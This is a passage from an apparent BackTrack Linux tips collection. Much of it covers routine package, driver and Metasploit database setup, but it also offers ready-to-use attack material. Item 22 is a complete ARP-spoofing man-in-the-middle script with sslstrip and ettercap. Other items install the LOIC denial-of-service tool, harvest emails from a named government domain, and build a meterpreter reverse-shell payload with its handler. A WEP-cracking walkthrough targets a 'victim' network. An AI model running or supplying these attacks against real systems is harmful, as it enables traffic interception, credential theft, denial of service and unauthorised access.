apt-cache showpkg <package>  Shows a lot more detail about <package>, and its relationships to other packages.

man apt  Will give you more info on these commands as well as many that are in less common usage.

Common dpkg commands

dpkg -i <package.deb>  Installs a package file; one that you downloaded manually, for example.
dpkg -c <package.deb>  Lists the contents of <package.deb>, a .deb file.
dpkg -I <package.deb>  Extracts package information from <package.deb>, a .deb file.
dpkg -r <package>  Removes an installed package named <package>.
dpkg -P <package>  Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files.
dpkg -L <package>  Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.
dpkg -s <package>  Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.
dpkg-reconfigure <package>  Reconfigures an installed package.
man dpkg  Will give you more info on these commands as well as many that are in less common usage.
19. Recording desktop [TUTORIAL]
Open terminal and type:
recordmydesktop --follow-mouse --no-sound --output=/root/backtracklinuxfanpage.ogv
20. Fix for Metasploit update in BackTrack 5 R2
When you run msfupdate you get this error:

[*] msfupdate
[*] Attempting to update the Metasploit Framework...

svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
Here is the FIX (it replaces the OpenSSL libraries bundled with Metasploit by symlinks to the system ones):
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
Now run msfupdate again and the error no longer appears.
21. Fix Audio control issue on BackTrack 5 R1 or R2
The fix for this is pretty simple.
1. Navigate to System > Preferences > Startup Applications on the main menu.
2. Click on Add.
3. Give a name pulseaudio.
4. For Command, type /usr/bin/pulseaudio
5. Click on Add, and then on Close.
6. Logout to close the X session, and restart it by typing startx
7. After logging in again go to System > Preferences > Sound
8. Unmute the sound
That's all....
22. Automatic MITM shell script.....
#!/bin/bash

#MITM script v2.0 beta


#author Backtrack page
#http://360percents.com/posts/automatic-mitm-shell-script/
#original scripts found on backtrack-linux.org by killadninja and tedbear
IFACES=`ifconfig | grep ' $' | cut -d " " -f1`
echo -n "What interface to use? ie: "$IFACES":"
read -e IFACE
echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
# Setup network
echo "[+] Setting up iptables"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
sleep 1
# Sslstrip
echo "[+] Starting sslstrip"
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
sleep 2
# urlsnarf
echo "[+] Starting urlsnarf"

urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &


sleep 1
# Ettercap
echo
echo "[+] Starting ettercap"
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$ROUTER"/ /"$VICTIM"/ &
cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -L
sleep 1
echo
echo "[+] IMPORTANT"
echo "After you have finished please close this script and clean up properly by hitting y"
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up and resetting iptables..."
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain

iptables --table nat --delete-chain


etterlog -p -i /root/$SESSION/$SESSION.eci
echo "[+] Clean up successful...Bye!"
exit
fi
exit

23. Wicd Error Message on BackTrack 5 R1 or R2

WICD Network Manager for the first time in BackTrack 5 R1 or R2
Set up your networking using the WICD Network Manager; you can find it in the menu:
Menu > Internet > Wicd Network Manager
NOTE: When starting WICD you will get an error:
Could not connect to wicd's D-Bus interface. Check the wicd log for error messages.
In order to get rid of this error you have to reboot BackTrack, then BEFORE starting WICD open up a terminal and type in the following:
root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults
Now after a reboot the error should not occur anymore.

24. Metasploit update and add db_autopwn BT5 r2


You can add db_autopwn in metasploit:
root@bt:~# cd /opt/metasploit/msf3
root@bt:/opt/metasploit/msf3# svn update
At revision 14857
root@bt:/opt/metasploit/msf3#
Now db_autopwn:

Download the plugin .rb file from here: http://www.mediafire.com/?9cwwdeaa1jc4t55

and move it into /opt/metasploit/msf3/plugins
Reboot BT5 R2
Then make sure the database is connected; do the following:
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

[ASCII-art banner, garbled in extraction]

       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 810 exploits - 452 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14857 updated today (2012.03.04)

msf > db_status
[*] postgresql connected to msf3dev
msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf >

Now you should be good to go !


Good luck!!!!!!!
25. Remove Old Kernel Versions from Backtrack (3.2.6 upgrade seen on reboot)
Tutorial is from: http://x73.cc/the-remove-the-old-kernel-images-the-from-backtrack-is.html
Ark@Dis9Team

Follow these steps to remove the old kernel images and clean up your GRUB boot menu.

First you need to find out which kernel you are currently using. Open a terminal and run
the following command:
uname -r

It will print the version of the Linux kernel you are running.
Then type:
dpkg --get-selections | grep linux

It will print all of the versions of the Linux kernel you have installed.
Then you can remove the kernels you are not using now, for example:
apt-get remove linux-image-2.6.38*

or
you can search for linux-image-2.6 (without quotes) in the Synaptic Package Manager.
Mark linux-image-(old version) and the related packages for removal.
Click the Apply button on the toolbar to complete the changes.
The results should show every currently installed as well as available kernel. Uncheck the
kernel images you want to uninstall, but be careful to keep the running one found with the
previous command.
Finally, just type:
update-grub
to update the GRUB boot menu.
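Added example, not from the tutorial or its source: instead of trusting a wildcard such as linux-image-2.6.38* not to catch the live kernel, compute the removal list from `uname -r` and `dpkg --get-selections` with the running kernel excluded. The selections text below is a constructed sample; `list_removable_live` runs the same logic on the real host.

```shell
#!/bin/sh
# Added example: list the linux-image packages that can be removed, i.e. every
# installed versioned image except the one that is running right now.
# $1: running kernel version (output of `uname -r`)
# $2: text of `dpkg --get-selections`
removable_kernels() {
    printf '%s\n' "$2" | awk -v run="$1" '
        # keep only versioned image packages still marked "install"
        $2 == "install" && $1 ~ /^linux-image-[0-9]/ {
            ver = $1
            sub(/^linux-image-/, "", ver)
            if (ver != run) print $1
        }'
}

# Constructed sample selections; 3.2.6 plays the running kernel.
SELECTIONS_SAMPLE='linux-image-2.6.38-8-generic    install
linux-image-2.6.39.4    install
linux-image-3.2.6    install
linux-headers-3.2.6    install
linux-image-2.6.35-22-generic    deinstall'

# Same logic on the real host. Read the list before acting on it:
#   list_removable_live | xargs -r apt-get remove
list_removable_live() {
    removable_kernels "$(uname -r)" "$(dpkg --get-selections)"
}
```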
26. INSTALL ATI and OPENCL in Backtrack 5 R1 or R2 - tutorial
DOWNLOAD ATI DRIVERS FOR BACKTRACK:

1. AMD Accelerated Parallel Processing (APP) SDK:
http://developer.amd.com/sdks/AMDAPPSDK/downloads/Pages/default.aspx

2. ATI driver installer for Linux:
http://support.amd.com/us/gpudownload/linux/Pages/radeon_linux.aspx

Install OpenCL on Backtrack

In this guide we will be installing and configuring OpenCL on Backtrack.


NOTE: You might need to make some minor tweaks depending on your system.
Let's begin:

First of all, before we start we want to make sure that our system is up to date.

root@bt:~# apt-get update && apt-get upgrade

Before we go on with installing the ATI drivers we need to get our kernel source prepared.

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/

Now that we are set up it's time to download the ATI drivers.
Download both drivers and move them to the desktop.
In a terminal write:
root@bt:~# cd /root/Desktop/
root@bt:~/Desktop# chmod +x amd-driver-installer-12-1-x86.x86_64.run
root@bt:~/Desktop# ./amd-driver-installer-12-1-x86.x86_64.run
root@bt:~/Desktop# reboot

Before we are finished there is one more thing that we need to install: the AMD Accelerated
Parallel Processing (APP) SDK. It needs to be installed according to your CPU architecture.

For 32 bit architecture:

root@bt:~# cd /root/Desktop/
root@bt:~/Desktop# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6-lnx32.tgz
root@bt:~/Desktop# tar -xvzf AMD-APP-SDK-v2.6-lnx32.tgz
root@bt:~/Desktop# ./Install-AMD-APP.sh

For 64 bit architecture:

root@bt:~# cd /root/Desktop/
root@bt:~/Desktop# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx64.tgz
root@bt:~/Desktop# tar -xvzf AMD-APP-SDK-v2.6-lnx64.tgz
root@bt:~/Desktop# ./Install-AMD-APP.sh

We will also need cmake and cmake++ along with some other library files.

First we install the libraries and cmake:

root@bt:~# apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake libboost1.40-all-dev

Before we can install cmake++ we need to set the ATI Stream paths (the echo spans two lines; bash shows the > continuation prompt for the second one):

root@bt:~# echo "ATISTREAMSDKROOT=/opt/AMDAPP
> export ATISTREAMSDKROOT" >> ~/.bashrc
root@bt:~# source ~/.bashrc

Now we can proceed with the installation:

root@bt:~# svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp
root@bt:~# cd calpp/trunk
root@bt:~/calpp/trunk# cmake .
root@bt:~/calpp/trunk# make
root@bt:~/calpp/trunk# make install

In addition now we can install Pyrit with the OpenCL option.

root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ /tmp/pyrit
root@bt:~# cd /tmp/pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd /tmp/pyrit/cpyrit_opencl && python setup.py build && python setup.py install

Now we can test Pyrit.

root@bt:~# pyrit list_cores
root@bt:~# pyrit benchmark

27. INSTALL LOIC IN BACKTRACK AND RUN


http://en.wikipedia.org/wiki/LOIC
Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application, written in C#. LOIC was initially developed by Praetox
Technologies, but was later released into the public domain,[1] and now is hosted on several
open source platforms.[2][3] It's named after a fictitious weapon from the Command &
Conquer series of video games.[4]

Write in terminal:
root@bt:~# aptitude install git-core monodevelop
root@bt:~# mkdir ~loic
root@bt:~# cd ~loic
root@bt:~/~loic# wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
root@bt:~/~loic# chmod a+x loic.sh
root@bt:~/~loic# ./loic.sh install
root@bt:~/~loic# ./loic.sh update
root@bt:~/~loic# ./loic.sh run

If ./loic.sh run does not work, run LOIC.exe directly (it is installed in /root/~loic/LOIC/bin/Debug/):
LOIC.exe run (open with mono: right click and choose mono)
Create a launcher for LOIC (right click on the desktop and use Create Launcher);
the type must be Application and the command is:
/root/~loic/LOIC/bin/Debug/LOIC.exe run
or this command:
/root/~loic/loic.sh run
Add a picture, then add it to the panel or desktop.

enjoy :)))
28. Uninstall Backtrack 5, R1 or R2 Dual Boot with Win 7 (Windows 7 Ultimate, but works on other
Windows 7 editions)
Uninstall Backtrack 5 Dual Boot with Win 7 (Windows 7 Ultimate, but works on other Windows
7 editions) for beginners:

1. Remove the old Backtrack installation

2. Reinstall Backtrack with a new disk space allocation
To remove the Backtrack installation, which is dual booted with Windows 7, I have to make sure
my Windows 7 can still work well. After googling, I got the message to do fixmbr to recover the
Windows 7 boot manager. So here are the steps.

A. Fixing the Windows 7 boot manager

1. Prepare your Win7 installation disk (DVD/USB) and plug it in.
2. Start your computer and set the boot priority in the BIOS settings (first boot USB, or CD/DVD-ROM).
3. When the Windows 7 installation comes up, choose Repair.
4. Choose "Repair this computer" with the recovery tool and click Next.
5. Choose Command Prompt.
6. Enter this command:
BootRec.exe /fixmbr
7. Reboot your computer.

B. Remove Backtrack
1. Now your computer should start Win 7 automatically.
2. Go to Control Panel > System and Security > Administrative Tools > Computer Management
> choose Disk Management (under storage properties).
3. You will clearly see your computer's partitions; delete your Backtrack partition by right click >
Delete Volume.
4. After it is deleted you will have new disk space and you can expand your other Windows
partition.

How to expand your partition drive C: or D:

1. Go to Control Panel > System and Security > Administrative Tools > Computer
Management > choose Disk Management (under storage properties).
2. You will see free space; now right click and delete the partition, and this partition will be
unallocated.
3. Right click on the partition which you want to expand and click on Extend Volume, then Next, Next and Finish (you can type how many MB to use for expanding your partition).
29. INSTALL GOOGLE CHROME AND RUN AS ROOT
Download the Google Chrome deb package and install it with the gdebi installer.
If you do not have the gdebi installer, install it with this command:
root@bt:~# apt-get install gdebi

Open the google-chrome launcher script with gedit or kate:
root@bt:~# gedit /usr/bin/google-chrome

In the last line:
exec -a "$0" "$HERE/chrome" "$@"
add --user-data-dir, so the line must look like this:
exec -a "$0" "$HERE/chrome" "$@" --user-data-dir
and save.
30. How make postgresql database in msfconsole and fix armitage to work -TUTORIAL

Armitage and Metasploit require a Postgresql database to work.

BEFORE MAKING A NEW POSTGRESQL DATABASE, INSTALL POSTGRESQL IN BACKTRACK
WITH THESE COMMANDS:
apt-get install postgresql libpq-dev
apt-get install libpgsql-ruby

root@bt:~# /etc/init.d/postgres
bash: /etc/init.d/postgres: No such file or directory
root@bt:~# /etc/init.d/postgresql-8.4
Usage: /etc/init.d/postgresql-8.4 {start|stop|restart|reload|force-reload|status|autovac-start|autovac-stop|autovac-restart}
root@bt:~# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server                                [ OK ]

root@bt:~# su postgres -c psql


could not change directory to "/root"
psql (8.4.8)
Type "help" for help.

postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit
postgres=# \password
Enter new password: (NOTICE:TYPE YOUR OWN PASSWORD,EXEMPLE :HACKER)
Enter it again: AGAIN TYPE PASSWORD
postgres=#
_______________________________________________________________________
MAKE POSTGRESQL DATABASE IN MSFCONSOLE
run msfconsole
msf > db_connect
[*]    Usage: db_connect <user:pass>@<host:port>/<database>
[*]       OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]    db_connect user@metasploit3
[*]    db_connect user:pass@192.168.0.2/metasploit3
[*]    db_connect user:pass@192.168.0.2:1500/metasploit3

msf > db_connect postgres:<your password>@127.0.0.1:5432/<name of database>


and you get a long run of NOTICE lines as Metasploit creates its tables (hosts, services, vulns, creds and so on), ending back at the prompt:
msf >
Now msfconsole is using the PostgreSQL database.
IMPORTANT:
Also save your user name and password in a text document so you can connect again after updating or
upgrading Metasploit.
_____________________________________________________________________
FIX ARMITAGE
Linux Users
Try to start the database with:
/etc/init.d/framework-postgres start

If you see:
bash: /etc/init.d/framework-postgres: No such file or directory

Then congratulations! The script to start the database was not installed. This is the result of a
change to the latest Metasploit installer. If you don't opt to start Metasploit as a service,
Metasploit won't start your database on bootup. To create a database startup script and fix this
issue:

Fix Armitage after creating the PostgreSQL database:

root@bt:~# echo 'exec /opt/metasploit/postgresql/scripts/ctl.sh "$@"' > /etc/init.d/framework-postgres
root@bt:~# chmod +x /etc/init.d/framework-postgres

(The second command makes the new script executable, which the start command above needs.)

You should be all set now. Your database is running and it will start when you reboot your
host too.

If you see:
bogus data in lock file "postmaster.pid"

Then you need to delete some files. Try:

rm /opt/metasploit/postgresql/postmaster.pid
rm /opt/metasploit/postgresql/.s.PGSQL.7337.lock
OR:
rm /opt/framework/postgresql/data/postmaster.pid
rm /opt/framework/postgresql/.s.PGSQL.7175
rm /opt/framework/postgresql/.s.PGSQL.7175.lock
/etc/init.d/framework-postgres start
__________________________________________________________________
the end:)))
31. Matrix letters in terminal
Open TERMINAL:
apt-get install cmatrix

Open new TERMINAL:
cmatrix
32. Email collector [METASPLOIT] [Tutorial]
Open METASPLOIT console:

msf > search collector
msf > use auxiliary/gather/search_email_collector
msf > set domain [target site] fbi.gov
msf > exploit
Wait for the emails to be collected.
33. HOW TO INSTALL FLASHPLAYER ON BACKTRACK 5 R1
Download flashplayer from the official website and move it to the desktop. DOWNLOAD ONLY
THE DEB.TAR.GZ FILE.

REMOVE FLASHPLAYER:
root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla
root@bt:~# rm -f /usr/lib/firefox/plugins/*flash*
root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash*
root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash*
root@bt:~# rm -f ~/.mozilla/plugins/*flash*so
root@bt:~# rm -rfd /usr/lib/nspluginwrapper

EXTRACT:
root@bt:~# tar xvfz flashplayer11_i386deb.tar.gz (write the name of your deb.tar.gz file)

THIS IS ONLY FOR 64 BIT; IF YOU ARE NOT ON 64 BIT, SKIP THESE:

root@bt:~# chown root:root libflashplayer.so
root@bt:~# chmod 644 libflashplayer.so
root@bt:~# cp -f libflashplayer.so /usr/lib/mozilla/plugins/
root@bt:~# rm -rf libflashplayer.so
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/

INSTALL AND ADD TO FIREFOX:

root@bt:~# cd Desktop
root@bt:~/Desktop# tar xvfz install_flash_player_11_i386.tar.gz (write the name of your deb.tar.gz file)
root@bt:~/Desktop# mkdir ~/.mozilla/plugins
root@bt:~/Desktop# mv -f libflashplayer.so ~/.mozilla/plugins/
MAKE A FOLDER NAMED plugins IN /usr/lib/firefox-addons/
root@bt:~/Desktop# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox-addons/plugins/
root@bt:~/Desktop# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/xulrunner-addons/plugins/

OPEN THE FOLDER ON THE DESKTOP AND YOU WILL SEE LOTS OF FOLDERS; IN
THESE FOLDERS YOU WILL SEE APPLICATIONS, ICONS, DOCUMENTS. MOVE ALL OF
THESE TO YOUR SYSTEM. EXAMPLE: IF SOMETHING IS IN
USR/LIB/APPLICATION, MOVE IT TO THE SYSTEM'S USR/LIB/APPLICATION.
34. Hacking with exploit/multi/handler on Back|track 5 r1
Open terminal:
msfpayload windows/meterpreter/reverse_tcp lhost=[YOUR IP] lport=4444 > MSF.EXE

Open new terminal:
msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=[YOUR IP] lport=4444 E
35. Hacking WEP key with Aircrack-ng on Back|track [TUTORIAL]
Open terminal:
airmon-ng
airmon-ng stop [your interface] [mine is wlan0]
airodump-ng [your interface] [mine is wlan0]
airodump-ng --channel [Victim channel] --write wep --bssid [Victim BSSID] [your interface] [mine is wlan0]
**Attention: do not close this terminal**

Open new terminal:
aireplay-ng -1 0 -a [Victim BSSID] [your interface] [mine is wlan0]
**Attention: wait until the router is recognized :-)**

Open new terminal:
aireplay-ng -3 -b [Victim BSSID] [your interface] [mine is wlan0]
**Attention: do not close this terminal**
Open new terminal:
aircrack-ng wep-01.cap
**Attention: wait to collect 5000 packets, then start the aircrack-ng attack**
